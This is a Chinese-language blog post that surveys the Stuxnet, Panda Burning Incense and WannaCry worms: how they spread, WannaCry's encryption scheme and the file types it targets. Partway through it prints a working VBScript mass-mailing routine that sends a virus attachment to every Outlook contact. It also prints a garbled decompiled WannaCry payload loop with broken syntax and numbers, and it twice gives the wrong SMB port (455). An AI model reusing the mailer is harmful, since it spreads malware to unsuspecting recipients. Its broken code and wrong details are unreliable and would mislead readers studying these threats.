近年来的病毒,这里特指蠕虫病毒。
Stuxnet蠕虫,MS10-061,当蠕虫值入机器后,把自己设置成开机自启动,并释放驱动文件,把该驱动设置为服务自启动。该驱动负责突破系统TCP半开连接数限制,以方便蠕虫通过网络传播。感染系统的可移动驱动器(即U盘等),可通过U盘传播自身。通过MS10-061打印机服务远程代码执行漏洞在局域网传播自身。并尝试利用一些弱口令企图猜解并取得主机权限,危及整个网络的安全。为计算机设置了一个后门,不断尝试连接远程黑客服务器,收集用户信息,接收黑客指令,并可获取黑客远程服务器木马并执行,带来严重安全隐患。
熊猫烧香对我来说有点久远,虽然我有初始的蠕虫病毒,但没有解析关键的代码,只从网络中找到说是变了50次的变种一部分。
Set objOA=Wscript.CreateObject("Outlook.Application")
创建一个OUTLOOK应用的对象
Set objMapi=objOA.GetNameSpace("MAPI")
取得MAPI名字空间 For i=1 to objMapi.AddressLists.Count 遍历地址簿
Set objAddList=objMapi.AddressLists(i)For j=1 To objAddList. AddressEntries.Count
Set objMail=objOA.CreateItem (0)objMail.Recipients.Add (objAddList. AddressEntries (j)
取得收件人邮件地址
objMail.Subject=" 你好!"
设置邮件主题
objMail.Body="这次给你的附件,是我的新文档!"
设置信件内容
objMail.Attachments.Add(“c:virus.vbs")
把自己作为附件扩散出去
objMail.Send
发送邮件
Next
Next
Set objMapi=Nothing
Set objOA=Nothing
这块是源码的传播方式,其实是劫持了邮箱的账号密码,自动发送邮件给好友,其实附件带的就是病毒复制体了。与最近的比特币病毒相关的也只有在局域网中通过455端口迅速感染。
它的感染方式主要是通过下载,病毒会删除ghost文件,并对文档的图片进行更换,不会对文件造成损坏。
而比特币病毒不同。
WannaCry木马利用泄漏的方程式工具包中的“永恒之蓝”漏洞工具从MS17_010漏洞进行网络端口(455端口)扫描攻击,目标机器被成功攻陷后会从攻击机下载WannaCry木马进行感染,并作为攻击机再次扫描互联网和局域网其他机器,行成蠕虫感染大范围超快速扩散。
木马母体为mssecsvc.exe,运行后会扫描随机ip的互联网机器,尝试感染,也会扫描局域网相同网段的机器进行感染传播,此外会释放敲诈者程序tasksche.exe,对磁盘文件进行加密勒索。
V1=0;
Do
{
P_payload=&payload_x86;
If(v1)
P_payload=&payload_x64;
V3=*(void **)&FileName[4*v1=260];
(&v11+v1)=(int)v3;
memcpy(v3,p_payload,v1!=0?51364:16480);
*(&v11+v1)+=v1!=0?513634:16480;
++v1
}
While(v1<2);
V4+CreateFileA(FileName,0*8000000u,1u,03u,4u,0);
这个就是利用MS17_010的数据了,这个锅只能背给不更新补丁的人了。
木马加密使用AES加密文件,并使用非对称加密算法RSA 2048加密随机密钥,每个文件使用一个随机密钥,下面就是密码学的概率了,就和当初二战时期德军的恩尼格玛密码机一样,每一天的密码算法是天文数字,除非得到密钥,其余不可能破解。
熊猫烧香是不会损害文件的,但这个是可以的。
.doc, .docx, .xls, .xlsx, .ppt, .pptx, .pst, .ost, .msg, .eml, .vsd, .vsdx, .txt, .csv, .rtf, .123, .wks, .wk1, .pdf, .dwg, .onetoc2, .snt, .jpeg, .jpg, .docb, .docm, .dot, .dotm, .dotx, .xlsm, .xlsb, .xlw, .xlt, .xlm, .xlc, .xltx, .xltm, .pptm, .pot, .pps, .ppsm, .ppsx, .ppam, .potx, .potm, .edb, .hwp, .602, .sxi, .sti, .sldx, .sldm, .sldm, .vdi, .vmdk, .vmx, .gpg, .aes, .ARC, .PAQ, .bz2, .tbk, .bak, .tar, .tgz, .gz, .7z, .rar, .zip, .backup, .iso, .vcd, .bmp, .png, .gif, .raw, .cgm, .tif, .tiff, .nef, .psd, .ai, .svg, .djvu, .m4u, .m3u, .mid, .wma, .flv, .3g2, .mkv, .3gp, .mp4, .mov, .avi, .asf, .mpeg, .vob, .mpg, .wmv, .fla, .swf, .wav, .mp3, .sh, .class, .jar, .java, .rb, .asp, .php, .jsp, .brd, .sch, .dch, .dip, .pl, .vb, .vbs, .ps1, .bat, .cmd, .js, .asm, .h, .pas, .cpp, .c, .cs, .suo, .sln, .ldf, .mdf, .ibd, .myi, .myd, .frm, .odb, .dbf, .db, .mdb, .accdb, .sql, .sqlitedb, .sqlite3, .asc, .lay6, .lay, .mml, .sxm, .otg, .odg, .uop, .std, .sxd, .otp, .odp, .wb2, .slk, .dif, .stc, .sxc, .ots, .ods, .3dm, .max, .3ds, .uot, .stw, .sxw, .ott, .odt, .pem, .p12, .csr, .crt, .key, .pfx, .der
这些都是病毒会攻击的文档后缀。
和熊猫不同的是,它会通过tor匿名,监听9050端口,通过本地代理通信实现与服务器连接。